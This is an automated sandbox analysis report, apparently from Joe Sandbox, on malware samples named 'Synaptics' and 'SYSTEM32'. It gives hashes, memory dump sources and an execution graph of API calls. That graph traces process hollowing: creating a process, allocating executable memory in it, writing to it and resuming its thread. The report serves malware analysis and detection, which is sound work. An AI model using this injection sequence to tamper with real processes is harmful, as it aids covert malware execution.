                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46ab2494e90b2aebe6116041a165aa1bff393687ee2f0f6b6e93a06538ee354a
                                                    • Instruction ID: e8d332072e7a30bf4449c7b918865ad4c17379ed3ff09cbcbdf7597659941f14
                                                    • Opcode Fuzzy Hash: 46ab2494e90b2aebe6116041a165aa1bff393687ee2f0f6b6e93a06538ee354a
                                                    • Instruction Fuzzy Hash: 2F21AD70F002158FCB54EB789850AAEBBF6EF89208B14447DE646DB360EF34DC058B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b4765a82a2e6cefe7719f98ff66815a0553bbe7a3e53381282bd49ef4b6e6d7
                                                    • Instruction ID: 4f550e08080065c35fea726a8e83c0859a1da76af0e425712f1eb9a4e529c34b
                                                    • Opcode Fuzzy Hash: 8b4765a82a2e6cefe7719f98ff66815a0553bbe7a3e53381282bd49ef4b6e6d7
                                                    • Instruction Fuzzy Hash: B7215EB1F013569FDB695B79B56876E3BA9AB84389F04002DE903C6340DF24C845CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: df08b36644626f45efebadfa7d82a4bca32d6a7f0d984087cface90cd87d7004
                                                    • Instruction ID: a7fdfe514fbdec3d7a7ce77b42305ac007ed4d88d41b44a5b0e7d51a097dba24
                                                    • Opcode Fuzzy Hash: df08b36644626f45efebadfa7d82a4bca32d6a7f0d984087cface90cd87d7004
                                                    • Instruction Fuzzy Hash: 8311AFA0B002189BDB18ABFC58146AFB5DEDFD9248F00453DD40AD7B94DF349C0647E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c5ced16c31f83a998317cbbba1ca63b750f71194833ba522f982f7ce1cf7886
                                                    • Instruction ID: 3388a8bcdd979c4e54669db93d15967021960668eb197fc007b249a5421a3f48
                                                    • Opcode Fuzzy Hash: 1c5ced16c31f83a998317cbbba1ca63b750f71194833ba522f982f7ce1cf7886
                                                    • Instruction Fuzzy Hash: 042124B1B013258FDB686B79F56876E36A9AF44389F04042DDA56C6744DF34C444CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4262b31d13680dd9d721758afc0b98f710c3900321245a560c7c54def14628ea
                                                    • Instruction ID: 86e04d9698248247a2d8c0da6818da39ac35108eff5ec72c89a103becdb0f3ce
                                                    • Opcode Fuzzy Hash: 4262b31d13680dd9d721758afc0b98f710c3900321245a560c7c54def14628ea
                                                    • Instruction Fuzzy Hash: 940186347093905FC717A37958245AE7FE69FCB19831544EAD146CF7A3CE15CC0A87A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26991dff4b422d7ced602ba9be54ef99ab59426f6ebfc243dfc4ca04b8d2e3a8
                                                    • Instruction ID: 89e35b0d184f1c4261afbdaf23fb9c3faf73c6695aeb56f0e981dff7a845c2f0
                                                    • Opcode Fuzzy Hash: 26991dff4b422d7ced602ba9be54ef99ab59426f6ebfc243dfc4ca04b8d2e3a8
                                                    • Instruction Fuzzy Hash: 0CF069B4A012198FDB18EBA9D4607AF77AAAF04784F06006DCA19D7741DB349940CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12a2e9efbc4f8126a18e0cce86219ad849d0bcc2622c678721942241b58022d4
                                                    • Instruction ID: 35758e3175e6fa6298db0a46d3c31db6ed9638d020b6bee411baed9370b1e248
                                                    • Opcode Fuzzy Hash: 12a2e9efbc4f8126a18e0cce86219ad849d0bcc2622c678721942241b58022d4
                                                    • Instruction Fuzzy Hash: B5C012A8509316CED73427A8A128BAC2A299B90388F000048B28248B988F3408008FA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a753e12282109af703185a7333a2fd4775db1d85de58fde13f1eac01735cb08f
                                                    • Instruction ID: b5b276a93691b5bb2eacc4f34c892f17ab5322de159b675b6ee29dc17bbb58dd
                                                    • Opcode Fuzzy Hash: a753e12282109af703185a7333a2fd4775db1d85de58fde13f1eac01735cb08f
                                                    • Instruction Fuzzy Hash: 02C012A8509356CADB3417A8A128BAC3A299790388F000049B24244A948F2408008F52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage: 9.4%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 214
                                                    Total number of Limit Nodes: 15
                                                    execution_graph 37184 15db878 DuplicateHandle 37185 15db90e 37184->37185 37186 15dfcb8 37187 15dfd20 CreateWindowExW 37186->37187 37189 15dfddc 37187->37189 37282 15d9168 37283 15d9169 37282->37283 37286 15d9260 37283->37286 37284 15d9177 37287 15d9273 37286->37287 37288 15d9283 37287->37288 37291 15d98f0 37287->37291 37295 15d98e0 37287->37295 37288->37284 37292 15d9904 37291->37292 37294 15d9929 37292->37294 37299 15d9450 37292->37299 37294->37288 37296 15d9904 37295->37296 37297 15d9450 LoadLibraryExW 37296->37297 37298 15d9929 37296->37298 37297->37298 37298->37288 37300 15d9ad0 LoadLibraryExW 37299->37300 37302 15d9b49 37300->37302 37302->37294 37303 15d9848 37304 15d988a 37303->37304 37305 15d9890 GetModuleHandleW 37303->37305 37304->37305 37306 15d98bd 37305->37306 37307 6051f50 37308 6051f62 37307->37308 37309 6051f78 37308->37309 37311 6051fa3 37308->37311 37312 6051fc6 37311->37312 37314 6051fe5 37311->37314 37313 6051fe1 37312->37313 37317 6052130 FindCloseChangeNotification 37312->37317 37319 6052128 37312->37319 37313->37309 37314->37309 37318 605218a 37317->37318 37318->37313 37320 6052130 FindCloseChangeNotification 37319->37320 37321 605218a 37320->37321 37321->37313 37322 60511b0 37323 605133b 37322->37323 37324 60511d6 37322->37324 37324->37323 37329 15dff00 SetWindowLongW 37324->37329 37331 15dfef8 SetWindowLongW 37324->37331 37333 6051429 37324->37333 37336 6051430 PostMessageW 37324->37336 37330 15dff6c 37329->37330 37330->37324 37332 15dff6c 37331->37332 37332->37324 37334 6051430 PostMessageW 37333->37334 37335 605149c 37334->37335 37335->37324 37337 605149c 37336->37337 37337->37324 37338 60503f0 37340 60503a2 37338->37340 37342 60503f3 37338->37342 37339 605035a 37340->37339 37345 60507d8 37340->37345 37350 60507c0 37340->37350 37341 60503e3 37346 60507e7 37345->37346 37347 60507fa 37346->37347 37355 6050818 37346->37355 37385 6050828 37346->37385 37347->37341 37351 60507d8 37350->37351 
37352 60507fa 37351->37352 37353 6050818 11 API calls 37351->37353 37354 6050828 11 API calls 37351->37354 37352->37341 37353->37351 37354->37351 37356 6050828 37355->37356 37415 6050d40 37356->37415 37419 6050d3c 37356->37419 37357 60508fa 37359 6050bb0 37357->37359 37383 6050f70 GetThreadContext 37357->37383 37384 6050f68 GetThreadContext 37357->37384 37358 605094e 37358->37359 37374 6051020 ReadProcessMemory 37358->37374 37375 6051028 ReadProcessMemory 37358->37375 37359->37346 37360 6050989 37360->37359 37361 6050a0a VirtualAllocEx 37360->37361 37362 6050a4f 37361->37362 37362->37359 37368 60510e2 WriteProcessMemory 37362->37368 37369 605119f WriteProcessMemory 37362->37369 37370 60510e8 WriteProcessMemory 37362->37370 37363 6050b19 37376 60510e2 WriteProcessMemory 37363->37376 37377 605119f WriteProcessMemory 37363->37377 37378 60510e8 WriteProcessMemory 37363->37378 37364 6050a7e 37364->37359 37364->37363 37371 60510e2 WriteProcessMemory 37364->37371 37372 605119f WriteProcessMemory 37364->37372 37373 60510e8 WriteProcessMemory 37364->37373 37365 6050b36 37365->37359 37381 6050f70 GetThreadContext 37365->37381 37382 6050f68 GetThreadContext 37365->37382 37366 6050b6e 37366->37359 37367 6050b76 ResumeThread 37366->37367 37367->37359 37368->37364 37369->37364 37370->37364 37371->37364 37372->37364 37373->37364 37374->37360 37375->37360 37376->37365 37377->37365 37378->37365 37381->37366 37382->37366 37383->37358 37384->37358 37386 60508cc 37385->37386 37406 6050d40 CreateProcessW 37386->37406 37407 6050d3c CreateProcessW 37386->37407 37387 60508fa 37389 6050bb0 37387->37389 37423 6050f70 37387->37423 37427 6050f68 37387->37427 37388 605094e 37388->37389 37431 6051020 37388->37431 37434 6051028 ReadProcessMemory 37388->37434 37389->37346 37390 6050989 37390->37389 37391 6050a0a VirtualAllocEx 37390->37391 37392 6050a4f 37391->37392 37392->37389 37436 60510e2 37392->37436 37440 605119f 37392->37440 37443 60510e8 37392->37443 37393 6050b19 37403 60510e2 
WriteProcessMemory 37393->37403 37404 605119f WriteProcessMemory 37393->37404 37405 60510e8 WriteProcessMemory 37393->37405 37394 6050a7e 37394->37389 37394->37393 37398 60510e2 WriteProcessMemory 37394->37398 37399 605119f WriteProcessMemory 37394->37399 37400 60510e8 WriteProcessMemory 37394->37400 37395 6050b36 37395->37389 37408 6050f70 GetThreadContext 37395->37408 37409 6050f68 GetThreadContext 37395->37409 37396 6050b6e 37396->37389 37397 6050b76 ResumeThread 37396->37397 37397->37389 37398->37394 37399->37394 37400->37394 37403->37395 37404->37395 37405->37395 37406->37387 37407->37387 37408->37396 37409->37396 37416 6050dbb CreateProcessW 37415->37416 37418 6050e91 37416->37418 37420 6050d40 CreateProcessW 37419->37420 37422 6050e91 37420->37422 37424 6050fb2 37423->37424 37425 6050fbc GetThreadContext 37423->37425 37424->37425 37426 6050fea 37425->37426 37426->37388 37428 6050f70 GetThreadContext 37427->37428 37430 6050fea 37428->37430 37430->37388 37432 6051028 ReadProcessMemory 37431->37432 37433 60510a8 37432->37433 37433->37390 37435 60510a8 37434->37435 37435->37390 37437 60510e8 WriteProcessMemory 37436->37437 37439 6051173 37437->37439 37439->37394 37441 6051152 WriteProcessMemory 37440->37441 37442 6051173 37441->37442 37442->37394 37444 6051130 37443->37444 37445 6051138 WriteProcessMemory 37443->37445 37444->37445 37446 6051173 37445->37446 37446->37394 37190 15db650 GetCurrentProcess 37191 15db6ca GetCurrentThread 37190->37191 37192 15db6c3 37190->37192 37193 15db707 GetCurrentProcess 37191->37193 37194 15db700 37191->37194 37192->37191 37197 15db73d 37193->37197 37194->37193 37195 15db765 GetCurrentThreadId 37196 15db796 37195->37196 37197->37195 37198 15d40d0 37199 15d40da 37198->37199 37203 15d41c1 37198->37203 37209 15d3c64 37199->37209 37201 15d40f5 37204 15d41c4 37203->37204 37206 15d421e 37204->37206 37213 15d42b1 37204->37213 37217 15d42c0 37204->37217 37206->37199 37210 15d3c6f 37209->37210 37225 15d5184 37210->37225 37212 15d69dd 
37212->37201 37215 15d42b4 37213->37215 37214 15d43c4 37214->37214 37215->37214 37221 15d3de4 37215->37221 37219 15d42e7 37217->37219 37218 15d43c4 37218->37218 37219->37218 37220 15d3de4 CreateActCtxA 37219->37220 37220->37218 37222 15d5350 CreateActCtxA 37221->37222 37224 15d5413 37222->37224 37226 15d518f 37225->37226 37229 15d57d8 37226->37229 37228 15d6a7d 37228->37212 37230 15d57e3 37229->37230 37233 15d5808 37230->37233 37232 15d6b5a 37232->37228 37234 15d5813 37233->37234 37237 15d5838 37234->37237 37236 15d6c4a 37236->37232 37239 15d5843 37237->37239 37238 15d739c 37238->37236 37239->37238 37241 15db270 37239->37241 37242 15db278 37241->37242 37243 15db2c5 37242->37243 37246 15db538 37242->37246 37250 15db528 37242->37250 37243->37238 37247 15db545 37246->37247 37249 15db57f 37247->37249 37254 15d9750 37247->37254 37249->37243 37251 15db52c 37250->37251 37252 15db57f 37251->37252 37253 15d9750 LoadLibraryExW 37251->37253 37252->37243 37253->37252 37255 15d975b 37254->37255 37256 15dc278 37255->37256 37258 15d9818 37255->37258 37259 15d9823 37258->37259 37260 15d5838 LoadLibraryExW 37259->37260 37261 15dc2e7 37260->37261 37266 15de03f 37261->37266 37272 15de058 37261->37272 37277 15de068 37261->37277 37262 15dc320 37262->37256 37267 15de04f 37266->37267 37268 15de0a5 37267->37268 37270 15de4e8 LoadLibraryExW 37267->37270 37271 15de4d7 LoadLibraryExW 37267->37271 37268->37262 37269 15de0e5 37269->37262 37270->37269 37271->37269 37273 15de060 37272->37273 37274 15de021 37273->37274 37275 15de4e8 LoadLibraryExW 37273->37275 37276 15de4d7 LoadLibraryExW 37273->37276 37274->37262 37275->37274 37276->37274 37278 15de069 37277->37278 37279 15de0a5 37278->37279 37280 15de4e8 LoadLibraryExW 37278->37280 37281 15de4d7 LoadLibraryExW 37278->37281 37279->37262 37280->37279 37281->37279
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7accbfea93c7f8fda8416b456d179df4b3cc361001c2c2faa574818c67a1a40
                                                    • Instruction ID: 0564f4393baafb6c5502757437810d199483386f9246febc8a8d216ca12a4ce4
                                                    • Opcode Fuzzy Hash: a7accbfea93c7f8fda8416b456d179df4b3cc361001c2c2faa574818c67a1a40
                                                    • Instruction Fuzzy Hash: 91425F74B00204CFDB59DF69C598A6EBBF6BF88304F5584A9E4069B3A1DB34EC45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13898ecfcf584f8511078b94433119ea14302bae6d4052927b0f3908c6695a9b
                                                    • Instruction ID: 6c15a0f67f316b5297913e874f9fb237282bcc15b781630043325f88b74ffe96
                                                    • Opcode Fuzzy Hash: 13898ecfcf584f8511078b94433119ea14302bae6d4052927b0f3908c6695a9b
                                                    • Instruction Fuzzy Hash: F5424C71A04308CFDB24DF65C548A6ABBFAFF84305F5498A9E0468B6A0DB75F885CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7178b7a6487de48e32fd2f2d7af8557b2689fc249eca17b6ad46986b0b62a29
                                                    • Instruction ID: 834009fcfcb7e1c5656e9172f8270b5ab2cbe48d821e7d14956fc072c9c60ce4
                                                    • Opcode Fuzzy Hash: c7178b7a6487de48e32fd2f2d7af8557b2689fc249eca17b6ad46986b0b62a29
                                                    • Instruction Fuzzy Hash: 2C123C75A002458FCB54DF69C588AAABBF6FF88314B59C4A9E449DB362C730EC45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bb841ef84c43d08fa6a4ca241b98b309efcedaad3595dfbc66f19d1a157f0aa
                                                    • Instruction ID: dfbb3ebb2c0ae6974814688a934afa7b917556d475d4c4944a8433ee3dc8d2ea
                                                    • Opcode Fuzzy Hash: 8bb841ef84c43d08fa6a4ca241b98b309efcedaad3595dfbc66f19d1a157f0aa
                                                    • Instruction Fuzzy Hash: 48024775A40705CFDBA5CF6AC584AAEBBF2BF48300F1489A9E4569B761D734E881CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB6B0
                                                    • GetCurrentThread.KERNEL32 ref: 015DB6ED
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB72A
                                                    • GetCurrentThreadId.KERNEL32 ref: 015DB783
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 32a9b59643ef98dccaf434cde00f43b1558c349ba312b179675a4767d93973ae
                                                    • Instruction ID: 44360349afb4ae1b1ddc51cd88df506a7df425d7c6c97bc2654fba98987b4245
                                                    • Opcode Fuzzy Hash: 32a9b59643ef98dccaf434cde00f43b1558c349ba312b179675a4767d93973ae
                                                    • Instruction Fuzzy Hash: 125176B09002499FDB14CFA9DA88BDEBFF5BF49304F248469E009A7360D7345988CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB6B0
                                                    • GetCurrentThread.KERNEL32 ref: 015DB6ED
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB72A
                                                    • GetCurrentThreadId.KERNEL32 ref: 015DB783
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: cf4c8f3e2e720974de343dbcf2cb88cf7cd580e9633a44191f71c973235d2285
                                                    • Instruction ID: 4f601cf3512763b5edf146e9b627b0b01130508729ca8f8bf9198980b65996d9
                                                    • Opcode Fuzzy Hash: cf4c8f3e2e720974de343dbcf2cb88cf7cd580e9633a44191f71c973235d2285
                                                    • Instruction Fuzzy Hash: 955156B09002499FEB14CFA9DA48BDEBBF5BF49304F248459E009A7360C7745984CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 6050828-60508f3 139 60508f5 call 6050d40 39->139 140 60508f5 call 6050d3c 39->140 43 60508fa-60508fc 44 6050902-6050937 43->44 45 6050cca-6050cdd 43->45 51 6050ce4-6050d06 44->51 52 605093d-6050947 44->52 45->51 71 6050d0f 51->71 72 6050d08-6050d0d 51->72 143 6050949 call 6050f70 52->143 144 6050949 call 6050f68 52->144 54 605094e-6050950 56 6050956-605095d 54->56 57 6050cb0-6050cc3 54->57 56->51 58 6050963-6050981 56->58 57->45 134 6050984 call 6051020 58->134 135 6050984 call 6051028 58->135 61 6050989-605098b 64 6050c96-6050ca9 61->64 65 6050991-6050994 61->65 64->57 66 6050996-60509d1 65->66 67 60509ec-6050a4d VirtualAllocEx 65->67 74 60509d3-60509d9 66->74 75 60509da-60509e6 66->75 81 6050a56-6050a65 67->81 82 6050a4f-6050a55 67->82 76 6050d11-6050d29 71->76 72->76 74->75 75->67 78 6050c7c-6050c8f 75->78 78->64 83 6050c62-6050c75 81->83 84 6050a6b-6050a76 81->84 82->81 83->78 145 6050a79 call 60510e2 84->145 146 6050a79 call 605119f 84->146 147 6050a79 call 60510e8 84->147 88 6050a7e-6050a80 90 6050a86-6050aa4 88->90 91 6050c48-6050c5b 88->91 95 6050aa6-6050ad1 90->95 96 6050b19-6050b2e 90->96 91->83 106 6050b10-6050b17 95->106 107 6050ad3-6050b00 95->107 136 6050b31 call 60510e2 96->136 137 6050b31 call 605119f 96->137 138 6050b31 call 60510e8 96->138 100 6050b36-6050b38 102 6050c14-6050c27 100->102 103 6050b3e-6050b5a 100->103 116 6050c2e-6050c41 102->116 103->51 109 6050b60-6050b66 103->109 106->95 106->96 131 6050b03 call 60510e2 107->131 132 6050b03 call 605119f 107->132 133 6050b03 call 60510e8 107->133 141 6050b69 call 6050f70 109->141 142 6050b69 call 6050f68 109->142 112 6050b6e-6050b70 113 6050b76-6050bae ResumeThread 112->113 114 6050bfa-6050c0d 112->114 117 6050bb7-6050bc4 113->117 118 6050bb0-6050bb6 113->118 114->102 116->91 120 6050bc6-6050bcc 117->120 121 6050be0-6050bf3 117->121 118->117 119 6050b08-6050b0a 119->106 119->116 120->72 125 6050bd2-6050bdb 120->125 121->114 
125->72 131->119 132->119 133->119 134->61 135->61 136->100 137->100 138->100 139->43 140->43 141->112 142->112 143->54 144->54 145->88 146->88 147->88
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 06050A39
                                                    • ResumeThread.KERNELBASE(?), ref: 06050B9A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: AllocResumeThreadVirtual
                                                    • String ID:
                                                    • API String ID: 234695336-0
                                                    • Opcode ID: 1efa3c92a7ba129999c1f4975b7f224210ed842eeb1b47dace0fec07528bb636
                                                    • Instruction ID: 05e11031984fc568e43ee5293a72690dfa3bb0edd0191e4dd620a4ee9237c19c
                                                    • Opcode Fuzzy Hash: 1efa3c92a7ba129999c1f4975b7f224210ed842eeb1b47dace0fec07528bb636
                                                    • Instruction Fuzzy Hash: 4BD19171E002198FDF64DBA4C950BDEBBF6AF89708F108569D40AAB380DB349D85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 148 6069460-606946c 149 6069470-6069476 148->149 150 606946e 148->150 151 60694a7-6069528 149->151 152 6069478-606947d 149->152 150->149 163 606957f-60695a1 151->163 164 606952a-606956f 151->164 153 6069496-606949c 152->153 154 606947f-6069484 152->154 153->151 155 606949e-60694a6 153->155 847 6069486 call 6069450 154->847 848 6069486 call 6069460 154->848 157 606948c-606948f 157->153 167 60695a5-60695bc 163->167 168 60695a3 163->168 849 6069571 call 606ce30 164->849 850 6069571 call 606ce80 164->850 851 6069571 call 606cdc8 164->851 852 6069571 call 606cdd8 164->852 171 60695be-60695c8 167->171 172 60695c9-606975d 167->172 168->167 197 6069763-60697bd 172->197 198 606cd3a-606cd78 172->198 175 6069577-606957e 197->198 204 60697c3-606c562 197->204 204->198 755 606c568-606c5d7 204->755 755->198 760 606c5dd-606c64c 755->760 760->198 765 606c652-606cbcb 760->765 765->198 830 606cbd1-606cd39 765->830 847->157 848->157 849->175 850->175 851->175 852->175
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: babc5bc42f4bbc990984eec8a259c9fcfb48ebe3717dca09b0c71b424fabe6b3
                                                    • Instruction ID: 70b042453daef9a02476f2676c6c00e83f42e92a99b886b6678ea6e7bd9d0b32
                                                    • Opcode Fuzzy Hash: babc5bc42f4bbc990984eec8a259c9fcfb48ebe3717dca09b0c71b424fabe6b3
                                                    • Instruction Fuzzy Hash: 2D636E70A4022DAFEB359B90CC55BEE76BAEF84704F1044E9E60A6B2D0DB751E80DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 853 6050818-60508f3 957 60508f5 call 6050d40 853->957 958 60508f5 call 6050d3c 853->958 858 60508fa-60508fc 859 6050902-6050937 858->859 860 6050cca-6050cdd 858->860 866 6050ce4-6050d06 859->866 867 605093d-6050947 859->867 860->866 886 6050d0f 866->886 887 6050d08-6050d0d 866->887 961 6050949 call 6050f70 867->961 962 6050949 call 6050f68 867->962 869 605094e-6050950 871 6050956-605095d 869->871 872 6050cb0-6050cc3 869->872 871->866 873 6050963-6050981 871->873 872->860 952 6050984 call 6051020 873->952 953 6050984 call 6051028 873->953 876 6050989-605098b 879 6050c96-6050ca9 876->879 880 6050991-6050994 876->880 879->872 881 6050996-60509d1 880->881 882 60509ec-6050a4d VirtualAllocEx 880->882 889 60509d3-60509d9 881->889 890 60509da-60509e6 881->890 896 6050a56-6050a65 882->896 897 6050a4f-6050a55 882->897 891 6050d11-6050d29 886->891 887->891 889->890 890->882 893 6050c7c-6050c8f 890->893 893->879 898 6050c62-6050c75 896->898 899 6050a6b-6050a76 896->899 897->896 898->893 946 6050a79 call 60510e2 899->946 947 6050a79 call 605119f 899->947 948 6050a79 call 60510e8 899->948 903 6050a7e-6050a80 905 6050a86-6050aa4 903->905 906 6050c48-6050c5b 903->906 910 6050aa6-6050ad1 905->910 911 6050b19-6050b2e 905->911 906->898 921 6050b10-6050b17 910->921 922 6050ad3-6050b00 910->922 954 6050b31 call 60510e2 911->954 955 6050b31 call 605119f 911->955 956 6050b31 call 60510e8 911->956 915 6050b36-6050b38 917 6050c14-6050c27 915->917 918 6050b3e-6050b5a 915->918 931 6050c2e-6050c41 917->931 918->866 924 6050b60-6050b66 918->924 921->910 921->911 949 6050b03 call 60510e2 922->949 950 6050b03 call 605119f 922->950 951 6050b03 call 60510e8 922->951 959 6050b69 call 6050f70 924->959 960 6050b69 call 6050f68 924->960 927 6050b6e-6050b70 928 6050b76-6050bae ResumeThread 927->928 929 6050bfa-6050c0d 927->929 932 6050bb7-6050bc4 928->932 933 6050bb0-6050bb6 928->933 929->917 931->906 935 6050bc6-6050bcc 932->935 
936 6050be0-6050bf3 932->936 933->932 934 6050b08-6050b0a 934->921 934->931 935->887 940 6050bd2-6050bdb 935->940 936->929 940->887 946->903 947->903 948->903 949->934 950->934 951->934 952->876 953->876 954->915 955->915 956->915 957->858 958->858 959->927 960->927 961->869 962->869
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 06050A39
                                                    • ResumeThread.KERNELBASE(?), ref: 06050B9A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: AllocResumeThreadVirtual
                                                    • String ID:
                                                    • API String ID: 234695336-0
                                                    • Opcode ID: 609cc9ae962354750ba7e5f38c7be84e0f6fdaf35d795092d0fe96c20be54b13
